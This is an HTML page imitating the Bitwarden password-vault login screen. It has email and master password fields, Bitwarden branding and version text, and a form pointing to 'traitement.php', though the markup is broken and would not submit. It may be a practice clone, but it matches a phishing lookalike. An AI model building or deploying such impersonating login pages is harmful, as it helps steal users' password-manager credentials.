<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="log.css">
    <title>log document</title>
</head>
<body>
    <div id="big"></div>
      <div id="logo">
        <img src="logo.png" style="height: 75px;" width="215px" >
      </div>
        <p id="zp1">
            Log in or create a new account to access
        </p><br>
        <p id="zp2"> your secure vault. </p>

    <div id="grddiv">
        <div id="p1">
            <p>Emai Address </p>
        </div>
        <form action="traitement.php" method="post"></form>
  
        <div id="form">
            <p>
                <input type="text" name="psodo" />
            </p>
            <div id="pp1">
              <p>
                Master Password
              </p>
            </div>
            <div id="form2">
                  <p>
                    <input type="text" name="psodo" />
                  </p>
                  <div id="pp3">
                     <p>get master password hint</p>
                  </div>
                <div id="pp2">
                  <p>
                    <input type="checkbox" checked/>  
                  </p>
                    <div id="pp4">
                       <p>remember email</p>                       
                   </div>
                </div>
                <div id="bt">
                    <button id="bb">Log In</button>
                </div>

                <div id="bt1">
                    <button id="bb1"> create account</button>
                </div>

                <div id="bt2">
                    <button id="bb2"> Entreprise Single Sign On</button>
                </div>

        </div>

        <div id="zp3">
          <p> xx 2022, Bitwarden Inc.</p>
         </div>
         <div id="zp4">
          <p>version 2.27.0</p>
         </div>
        
      </div>









    </div>

    


    
</body>
</html>